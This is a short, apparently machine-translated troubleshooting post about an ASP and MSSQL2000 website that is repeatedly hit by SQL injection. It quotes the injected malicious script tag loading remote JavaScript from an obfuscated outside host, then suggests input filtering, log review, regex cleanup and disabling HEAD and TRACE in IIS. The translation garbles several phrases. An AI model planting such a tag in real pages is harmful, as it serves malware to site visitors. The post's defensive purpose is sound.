The Web site is ASP, the database is MSSQL2000, and is often injected with the following characters.
<script src=http://3%62omb.com/c.js></script>
This phenomenon shows that the site's ASP program has injected loopholes, to solve the problem, must be saved to the database before the filter, as well as form submission filter, URL filtering. In addition, by checking the log file to find the cause of the vulnerability and then timely repair and repair, and then replace the regular expression <script src=http://3%62omb.com/c.js></script> at the same time, in the server IIS, Find this hanging horse site properties, home directory-Configuration---found. asp and. aspx innuendo, remove the inside head and trace operations, only get and post can be resolved,
Note Removing head operations and trace operations do not affect normal Web access at all. Normal Web sites do not require both operations.